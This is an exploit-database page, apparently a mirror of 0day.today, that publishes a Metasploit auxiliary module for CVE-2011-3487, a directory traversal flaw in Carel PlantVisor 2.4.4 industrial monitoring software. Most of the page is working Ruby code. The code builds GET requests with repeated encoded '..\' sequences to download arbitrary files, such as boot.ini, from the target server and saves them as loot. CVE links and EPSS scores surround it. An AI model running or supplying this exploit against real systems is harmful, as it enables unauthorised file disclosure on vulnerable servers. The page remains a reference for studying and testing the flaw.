Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtJames Fitts1337DAY-ID-28532
HistorySep 13, 2017 - 12:00 a.m.

Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure Exploit

2017-09-1300:00:00
James Fitts
0day.today
24

0.005 Low

EPSS

Percentile

77.3%

JSON

Exploit for windows platform in category web applications

require 'msf/core'
 
class MetasploitModule < Msf::Auxiliary
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Carel [email protected] Directory Traversal',
            'Description'    => %q{
                This module exploits a directory traversal vulnerability
                found in Carel [email protected] <= 2.4.4. The vulnerability is
                triggered by sending a specially crafted GET request to the
                victim server.
            },
            'Author'         => [ 'james fitts' ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'CVE', '2011-3487' ],
                    [ 'BID', '49601' ],
                ],
            'DisclosureDate' => 'Jun 29 2012'))
 
        register_options(
            [
                OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
                OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
                Opt::RPORT(80)
            ], self.class )
    end
 
    def run
 
    depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
    levels = "/" + ("..%5c" * depth)
 
    res = send_request_raw({
        'method'    => 'GET',
        'uri'       => "#{levels}#{datastore['FILE']}",
    })
 
    if res and res.code == 200
        loot = res.body
        if not loot or loot.empty?
            print_status("File from #{rhost}:#{rport} is empty...")
            return
        end
        file = ::File.basename(datastore['FILE'])
        path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
        print_status("Stored #{datastore['FILE']} to #{path}")
        return
    end
 
    end
end

#  0day.today [2018-01-03]  #

Related

cve 1
packetstorm 1
openvas 1
prion 1
nvd 1
cvelist 1
zdt 1
cve
cve
CVE-2011-3487
2011-09-16 14:28:11
packetstorm
packetstorm
Carel PlantVisor 2.4.4 Directory Traversal
2017-09-15 00:00:00
openvas
openvas
PlantVisor Enhanced <= 2.4.4 Directory Traversal Vulnerability - Active Check
2011-09-14 00:00:00
prion
prion
Directory traversal
2011-09-16 14:28:00
nvd
nvd
CVE-2011-3487
2011-09-16 14:28:11
cvelist
cvelist
CVE-2011-3487
2011-09-16 14:00:00
zdt
zdt
Carel PlantVisor 2.4.4 - Directory Traversal Vulnerability
2017-09-13 00:00:00

0.005 Low

EPSS

Percentile

77.3%

JSON
Related for 1337DAY-ID-28532
cve1packetstorm1openvas1prion1nvd1cvelist1zdt1